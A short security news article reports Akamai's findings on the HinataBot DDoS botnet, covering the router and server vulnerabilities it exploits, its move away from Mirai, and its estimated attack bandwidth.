New HinataBot botnet uses vulnerabilities in network equipment to carry out DDoS attacks

2 months ago · 0 comments

In a recent report from Akamai, experts revealed a new Golang-based botnet called HinataBot. The botnet uses known vulnerabilities to compromise routers and servers in order to organize massive DDoS attacks.

Among the methods used to distribute malware are the exploitation of open Hadoop YARN servers, as well as vulnerabilities in Realtek SDK (CVE-2014-8361) and Huawei HG532 routers (CVE-2017-17215).

Old unpatched vulnerabilities and weak credential protection have become easy prey for attackers. After all, they found a documented entry point that does not require complex social engineering tactics and the like.

The attackers behind HinataBot are said to have been active since at least December 2022. But first they used the Mirai malware in their attacks, and only then, starting on January 11, 2023, they switched to malware of their own design.

Since the first discovery of HinataBot, Akamai experts have also found several more variations of the malware, but fresher. In them, experts found more modular functionality and additional security measures. All this indicates that HinataBot is still in the active development stage.

HinataBot, like other similar DDoS botnets, is capable of contacting a C2 server to receive instructions and initiate attacks on targeted IP addresses within a given time.

While early versions of the botnet used protocols such as HTTP, UDP, TCP, and ICMP to carry out DDoS attacks, the latest iteration is limited to HTTP and UDP only. Why exactly the other two protocols ceased to be involved is unknown. Maybe the authors of the malware are just experimenting.

Akamai researchers conducted a number of HinataBot tests and, according to their calculations, in a real attack involving 10,000 bots, the maximum UDP flood rate will exceed 3.3 terabits per second (Tbps), which will lead to a powerful volumetric attack. An HTTP flood will generate approximately 27 gigabits per second (Gbps) of traffic.

“Attackers used the Go language to take advantage of its high performance, ease of multithreading, multi-architecture support, and operating system cross-compilation, but also likely because Go complicates compilation and makes reverse engineering difficult,” Akamai said.